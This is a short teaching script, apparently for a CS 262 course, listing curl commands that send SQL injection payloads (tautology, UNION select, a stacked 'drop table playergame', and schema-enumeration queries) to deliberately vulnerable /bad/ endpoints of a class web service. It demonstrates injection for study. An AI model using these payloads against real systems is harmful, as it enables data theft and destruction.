-- SQL injection examples (only work when /bad/* endpoints are enabled)

export SERVICE_URL=https://cs262-webservice-abebhtekgegdb2as.canadacentral-01.azurewebsites.net

# URL: .../bad/players/1 or 1=1
curl --request GET \
        ${SERVICE_URL}/bad/players/1%20or%201=1

# URL: .../bad/players/1 union select * from player
curl --request GET \
        ${SERVICE_URL}/bad/players/1%20union%20select%20*%20from%20player

# URL: .../bad/players/1; drop table playergame
curl --request GET \
        ${SERVICE_URL}/bad/players/1%3B%20drop%20table%20playergame

# URL: .../bad/players/1; select * from pg_tables where tableowner = 'kvlinden';
curl --request GET \
        ${SERVICE_URL}/bad/players/1%3B%20select%20*%20from%20pg_tables%20where%20tableowner%3D%27kvlinden%27

# URL: .../bad/players/1; select table_name,column_name,data_type from information_schema.columns where table_name='player';
curl --request GET \
        ${SERVICE_URL}/bad/players/1%3B%20select%20table_name,column_name,data_type%20from%20information_schema.columns%20where%20table_name%3D%27player%27

# Note that in PostgreSQL, users need read access to the pg_admin tables. To limit
# access, we'd need to limit restuser to DML but not DDL access. This turns out
# to be a bit tricker than may be appropriate for CS 262; I'd probably just need
# to figure it out and give them the code.
